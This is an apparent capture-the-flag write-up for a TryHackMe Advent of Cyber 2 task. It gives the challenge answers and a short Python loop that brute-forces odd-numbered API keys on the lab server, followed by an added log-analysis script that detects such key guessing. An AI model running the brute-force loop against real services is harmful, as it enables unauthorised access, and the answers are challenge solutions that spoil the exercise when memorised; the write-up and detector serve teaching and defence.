Advent Of CyberSecurity 2
Task 21 : [Day 16] Scripting Help! Where is Santa?
Let us start with an nmap scan.
What is the port number for the web server?
8000
Without using enumeration tools such as Dirbuster, what is the directory for the API? (without the API key)
/api
Looking at the source code of the index.html page, we can find the API directory.
Where is Santa right now?
Winter Wonderland, Hyde Park, London.
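We can brute-force the correct API key:

    import requests

    # Try every odd value from 1 to 99 as the key; replace <ip> with the machine's address.
    for x in range(1, 100, 2):
        url = "http://<ip>:8000/api/" + str(x)
        response = requests.get(url)
        # Print each candidate next to the server's reply so the valid key stands out.
        print(x, ": ", response.text)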
Find out the correct API key.
57
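From the defending side, the loop above leaves a clear trace: one client requesting many different /api/<key> paths in a row. The following is an added example, not part of the original write-up or the challenge server; the log format, the client addresses, the 403 status for wrong keys and the threshold are all assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample access log (not taken from the challenge server).
# 10.0.0.5 walks the odd keys 1..99 like the loop above; 10.0.0.9 is a
# normal client that already knows its key. A 403 for wrong keys is assumed.
SAMPLE_LOG = "\n".join(
    [f'10.0.0.5 "GET /api/{k} HTTP/1.1" {200 if k == 57 else 403}'
     for k in range(1, 100, 2)]
    + ['10.0.0.9 "GET /api/57 HTTP/1.1" 200',
       '10.0.0.9 "GET /api/57 HTTP/1.1" 200',
       '10.0.0.9 "GET / HTTP/1.1" 200']
)

# Hypothetical log line layout: <client> "GET /api/<key> HTTP/x.y" <status>
LINE_RE = re.compile(r'^(\S+) "GET /api/([^/\s?]+) HTTP/[\d.]+" (\d{3})$')


def find_key_guessers(log_text, max_distinct_keys=5):
    """Return clients that tried more distinct API keys than the threshold.

    A legitimate client reuses one key, so the number of distinct keys per
    client is a stronger signal than the raw request count.
    """
    keys = defaultdict(set)      # client -> set of key values requested
    failures = defaultdict(int)  # client -> count of non-200 replies
    for line in log_text.splitlines():
        match = LINE_RE.match(line.strip())
        if not match:
            continue  # not an /api/<key> request
        client, key, status = match.groups()
        keys[client].add(key)
        if status != "200":
            failures[client] += 1
    return {
        client: {"distinct_keys": len(tried), "failures": failures[client]}
        for client, tried in keys.items()
        if len(tried) > max_distinct_keys
    }


if __name__ == "__main__":
    for client, stats in find_key_guessers(SAMPLE_LOG).items():
        print(client, stats)
```

A key space of only 50 values is exhausted in 50 requests, so a check like this only helps when paired with rate limiting or lockout and a key that is long and random.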